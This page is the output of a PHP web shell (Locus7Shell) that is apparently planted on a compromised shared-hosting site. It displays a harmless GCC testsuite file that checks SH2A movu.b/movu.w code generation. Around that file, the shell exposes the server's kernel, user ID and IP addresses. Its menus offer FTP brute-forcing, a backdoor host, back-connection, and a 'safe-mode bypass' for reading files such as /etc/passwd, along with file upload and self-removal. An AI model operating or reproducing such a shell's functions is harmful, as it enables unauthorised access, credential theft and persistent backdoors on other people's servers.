Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/sh/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr50751-8.c (1.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* Check that on SH2A the 4 byte movu.b and movu.w displacement insns are
   generated.  This has to be checked with -O2 because some of the patterns
   rely on peepholes.  */
/* { dg-do compile { target { sh2a } } }  */
/* { dg-options "-O2" } */
/* { dg-final { scan-assembler-times "movu.b" 4 } } */
/* { dg-final { scan-assembler-times "movu.w" 3 } } */

int
test_00 (unsigned char* x)
{
  /* 1x movu.b  */
  return x[0];
}

int
test_01 (unsigned short* x)
{
  /* 1x movu.w  */
  return x[0];
}

int
test_02 (unsigned char* x)
{
  /* 1x movu.b  */
  return x[1];
}

int
test_03 (unsigned char* x)
{
  /* 1x movu.b  */
  return x[32];
}

int
test_04 (unsigned char* x)
{
  /* 1x movu.b  */
  return x[9000];
}

int
test_05 (unsigned short* x)
{
  /* 1x movu.w  */
  return x[9000];
}

int
test_06 (unsigned char* x, int i)
{
  /* No movu.b expected here.  Should use mov.b (r0,r4) + extu.b instead.  */
  return x[i];
}

int
test_07 (unsigned short* x, int i)
{
  /* No movu.w expected here.  Should use mov.w (r0,r4) + extu.w instead.  */
  return x[i];
}

int
test_08 (unsigned char* x, int c)
{
  /* No movu.b expected here.  Should use post-inc addressing instead.  */
  int s = 0;
  int i;
  for (i = 0; i < c; ++i)
    s += x[i];
  return s;
}

void
test_09 (unsigned char* x, unsigned char* y)
{
  /* No movu.b expected here, since the zero-extension is irrelevant.  */
  x[1] = y[1];
  x[2] = y[2];
}

void
test_10 (unsigned char* x, unsigned short* y)
{
  /* No movu.w expected here, since the zero-extension is irrelevant.  */
  x[1] = y[1];
  x[2] = y[2];
}

int
test_11 (unsigned char* x, unsigned short* y)
{
  /* 1x movu.w  */
  int yy = y[1];
  x[1] = yy;
  return yy;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0067 ]--